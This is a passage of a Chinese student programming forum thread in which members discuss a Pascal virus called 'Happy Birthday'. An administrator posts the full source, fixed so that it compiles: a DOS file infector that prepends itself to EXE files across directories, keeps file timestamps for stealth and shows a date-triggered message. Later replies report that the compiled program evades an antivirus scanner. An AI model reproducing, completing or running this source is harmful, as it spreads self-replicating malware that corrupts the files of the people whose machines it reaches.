切换到宽版
发帖 回复
返回列表
12345
  • 26792阅读
  • 41回复

Happy Birthday Pascal 蠕虫病毒 [复制链接]

 上一主题 下一主题
离线archimedes
管理员
只看该作者 30 发表于: 2005-12-28
编译不通过...
回复
举报
离线wcwswswws
OIFans入门选手
只看该作者 31 发表于: 2006-01-21
感觉一些地方有bug
回复
举报
离线archimedes
管理员
只看该作者 32 发表于: 2006-06-08
该程序在网上随处可见,说明不是楼主编的。
稍微修改了一下语法,通过了
复制代码
  2. { Happy Birthday (c) 1998 WoRm
  3. I don't take responsibility for any damage caused by this virus.
  4. It was made for EDUCATIONAL USE ONLY.
  5. AVs : No detection
  6. Size : 8928 bytes
  7. Payload : yes - display text
  8. Stealth : yes - file time
  9. Infects : exe
  10. Encryption : no
  11. If you've got any question write to [email]w0rm@freemail.c3.hu[/email]
  12. }
  13. {$I-}
  14. uses windos,dos;
  15. const virushossz=8928;
  16. dir:array[1..4] of string[10]=('g?Z`ido','g?Zmi}o`','g?Z`idox','g?Zmi}o`cf');
  17. var exebuffer,virusbuffer:array[1..virushossz] of byte;
  18. regia:word;
  19. regit:longint;
  20. xxxx:word;
  21. disable:file;
  22. konyvt:string;
  23. eddig:byte;
  24. y,m,d,dow:word;
  25. Function Crypt(S : String) : String; {Encryption/Decryption of}
  26. Var {A string.}
  27. i : Byte;
  28. begin
  29. For i := 1 to Length(S) Do
  30. S := Char(ord(S[i]) xor (i+3));
  31. Crypt := S;
  32. end;
  33. Procedure MEGLEPETES; {Display text}
  34. begin
  35. GetDate(y,m,d,dow);
  36. if (m=6) and (d=22) then begin
  37. writeln('$Mgwxp*Izgtpk3CzDz9');
  38. writeln('$MD)XHY+z= <?:p=5''.!!:LsOs');
  39. end;
  40. end;
  41. Function DosShell(command:String):Integer;Var {Maximize HEAP before exec}
  42. OldHeapEnd,
  43. NewHeapEnd: Word;
  44. Error:Integer;
  45. Begin
  46. Error:=0;
  47. If MemAvail<$1000 then Error:=8;
  48. If Error=0 then Begin
  49. NewHeapEnd:=Seg(HeapPtr^)-PrefixSeg;
  50. OldHeapEnd:=Seg(HeapEnd^)-PrefixSeg;
  51. asm
  52. mov ah,4Ah
  53. mov bx,NewHeapEnd
  54. mov es,PrefixSeg
  55. Int 21h
  56. jnc @EXIT
  57. mov Error,ax
  58. @EXIT:
  59. end; {asm}
  60. If Error=0 then begin
  61. SwapVectors;
  62. Exec(GetEnv('COMSPEC'),command);
  63. SwapVectors;
  64. asm
  65. mov ah,4Ah
  66. mov bx,OldHeapEnd
  67. mov es,PrefixSeg
  68. Int 21h
  69. jnc @EXIT
  70. mov Error,ax
  71. @EXIT:
  72. end; {asm}
  73. end; {If}
  74. end; {If}
  75. DosShell:=Error;
  76. end; {Function}
  77. procedure futtatas; {Execute host program}
  78. var fuf,orf:file;
  79. fufa:searchrec;
  80. ix:integer;
  81. comlin:string;
  82. begin
  83. findfirst(paramstr(xxxx),Anyfile,fufa);
  84. if fufa.size>virushossz then begin
  85. assign(fuf,fufa.name);
  86. windos.getfattr(fuf,regia);
  87. windos.setfattr(fuf,Archive);
  88. reset(fuf,1);
  89. assign(orf,crypt('slhsey::"hvj'));
  90. rewrite(orf,1);
  91. windos.getftime(fuf,regit);
  92. seek(fuf,fufa.size-(virushossz+10));
  93. blockread(fuf,exebuffer,virushossz);
  94. seek(orf,0);
  95. blockwrite(orf,exebuffer,virushossz);
  96. seek(fuf,virushossz);
  97. for ix:=1 to (fufa.size-(virushossz+virushossz+10)) div virushossz do
  98. begin
  99. blockread(fuf,exebuffer,virushossz);
  100. blockwrite(orf,exebuffer,virushossz);
  101. end;
  102. ix:=(fufa.size-(virushossz+virushossz+10)) mod virushossz;
  103. blockread(fuf,exebuffer,ix);
  104. blockwrite(orf,exebuffer,ix);
  105. close(orf);
  106. windos.setftime(fuf,regit);
  107. close(fuf);
  108. windos.setfattr(fuf,regia);
  109. for dow:=1 to paramcount do
  110. comlin:=comlin+' '+paramstr(dow);
  111. dosshell(crypt('+f&pag~f|=?!uiw'+comlin));
  112. erase(orf);
  113. end;
  114. end;
  115. function fertozott(ellfa:searchrec):boolean; {Is file already infected?}
  116. var i:byte;
  117. osszeg:longint;
  118. ellkey:array[1..10] of byte;
  119. modosito:byte;
  120. ellf:file;
  121. begin
  122. assign(ellf,ellfa.name);
  123. windos.getfattr(ellf,regia);
  124. windos.setfattr(ellf,archive);
  125. reset(ellf,1);
  126. windos.getftime(ellf,regit);
  127. seek(ellf,ellfa.size-10);
  128. blockread(ellf,ellkey,10);
  129. windos.setftime(ellf,regit);
  130. close(ellf);
  131. windos.setfattr(ellf,regia);
  132. osszeg:=1;
  133. for i:=1 to 10 do begin
  134. if ellkey[i]>9 then begin
  135. modosito:=ellkey[i] div 10;
  136. ellkey[i]:=ellkey[i]-10*modosito;
  137. end;
  138. osszeg:=osszeg*ellkey[i];
  139. end;
  140. if osszeg=126000 then fertozott:=true else fertozott:=false;
  141. end;
  142. procedure fertoz(filehelye,fileneve:string); {Infect a file - filehelye=pat
  143. h}
  144. label next; {of file,fileneve=its name
  145. }
  146. var fef:file;
  147. fefa:searchrec;
  148. k:array[1..10] of byte;
  149. dt:tdatetime;
  150. procedure keygen;
  151. var z:longint;
  152. i,a:byte;
  153. begin
  154. repeat
  155. z:=126000;
  156. for i:=1 to 10 do begin
  157. repeat
  158. a:=random(8)+1;
  159. until z mod a=0;
  160. z:=z div a;
  161. k[i]:=a;
  162. end;
  163. z:=1;
  164. for i:=1 to 10 do z:=z*k[i];
  165. until z=126000;
  166. for i:=1 to 10 do k[i]:=k[i]+random(24)*10;
  167. end;
  168. begin
  169. chdir(filehelye);
  170. findfirst(fileneve,Anyfile,fefa);
  171. if doserror=0 then begin
  172. if fefa.size>virushossz+10 then begin;
  173. assign(fef,fefa.name);
  174. windos.getfattr(fef,regia);
  175. windos.setfattr(fef,archive);
  176. reset(fef,1);
  177. windos.getftime(fef,regit);
  178. if fertozott(fefa)<>true then begin
  179. seek(fef,0);
  180. blockread(fef,exebuffer,virushossz);
  181. seek(fef,0);
  182. blockwrite(fef,virusbuffer,virushossz);
  183. seek(fef,fefa.size);
  184. blockwrite(fef,exebuffer,virushossz);
  185. keygen;
  186. blockwrite(fef,k,10);
  187. windos.setftime(fef,regit);
  188. eddig:=eddig+1;
  189. end;
  190. close(fef);
  191. windos.setfattr(fef,regia);
  192. end;
  193. end;
  194. end;
  195. Procedure fertozes(path : PathStr); {This one searches subdirs of the}
  197. {Path given as parameter and }
  199. Var SearchFile : SearchRec; {Infects them (Max. 5 files/run }
  201. begin
  202. if Path[Length(Path)] <> '\' then
  203. Path := Path + '\';
  204. FindFirst(Path + '*.*', $37, SearchFile);
  205. While (DosError = 0) and (eddig<5) do
  206. begin
  207. if ((SearchFile.Attr and $10) = $10) and (SearchFile.Name[1] <> '.') and
  208. (eddig<5) then
  209. Fertozes(Path + SearchFile.Name)
  210. else
  211. if (Pos('.EXE',SearchFile.Name)<>0) and (eddig<5) then begin
  212. fertoz(Path,SearchFile.Name);
  213. end;
  214. if (eddig<5) then FindNext(SearchFile);
  215. end;
  216. end;
  217. procedure inicializacio;
  218. var inf:file;
  219. begin
  220. assign(inf,paramstr(xxxx)); {Open current file (host)}
  222. getfattr(inf,regia); {Save file time for time }
  224. setfattr(inf,archive); {Stealth and move Vx code}
  226. reset(inf,1); {Into Vx buffer. }
  228. getftime(inf,regit);
  229. seek(inf,0);
  230. blockread(inf,virusbuffer,virushossz);
  231. setftime(inf,regit); {Close file and set time }
  233. close(inf);
  234. setfattr(inf,regia);
  235. end;
  236. begin
  237. getdir(0,konyvt); {Get current dir}
  238. randomize; {For the keygenerator}
  239. eddig:=0;
  240. inicializacio; {Initialize buffers}
  241. getdate(y,m,d,dow);
  242. if dow=5 then fertozes('c:\'); {Infect files}
  243. for dow:=1 to 4 do begin
  244. chdir(crypt(dir[dow]));
  245. if ioresult=0 then fertozes(crypt(dir[dow]));
  246. end;
  247. futtatas; {Execute host}
  248. MEGLEPETES; {Payload}
  249. chdir(konyvt); {Reset original dir}
  250. end.

至于结果,我不敢试。
回复
举报
离线r134a
OIFans全国铜奖
只看该作者 33 发表于: 2006-08-01
这个病毒通过邮件传递,如果用OUTLOOK,不用打开邮件也会感染。它会往外乱发邮件,另外,当月+日=13的时候,会慢慢删除你硬盘里的EXE、DLL文件,这样你就有机会重装电脑了
[ 此贴被bluetear在2006-08-01 12:09重新编辑 ]
.


祝大家明年NOIP大获全盛!


.
回复
举报
离线r134a
OIFans全国铜奖
只看该作者 34 发表于: 2006-08-01
难道,这就是著名的"Happy Birthday!"蠕虫病毒么?~~~~
.


祝大家明年NOIP大获全盛!


.
回复
举报
离线anacreon
OIFans入门选手
只看该作者 35 发表于: 2006-08-02
先说运行以后的后果。。。
代码好长。。。。晕的
回复
举报
离线zx_pascal
OIFans入门选手
只看该作者 36 发表于: 2006-08-07
有道理!
回复
举报
离线archimedes
管理员
只看该作者 37 发表于: 2006-08-11
编译后,Rising v2006查不出病毒
回复
举报
离线r134a
OIFans全国铜奖
只看该作者 38 发表于: 2006-08-11
pascal编的病毒都查不出来。
.


祝大家明年NOIP大获全盛!


.
回复
举报
离线archimedes
管理员
只看该作者 39 发表于: 2006-08-14
代码中到处是asm...end asm...end
干吗那么多汇编代码
回复
举报
发帖 回复
返回列表
12345
快速回复
限100 字节
 
上一个 下一个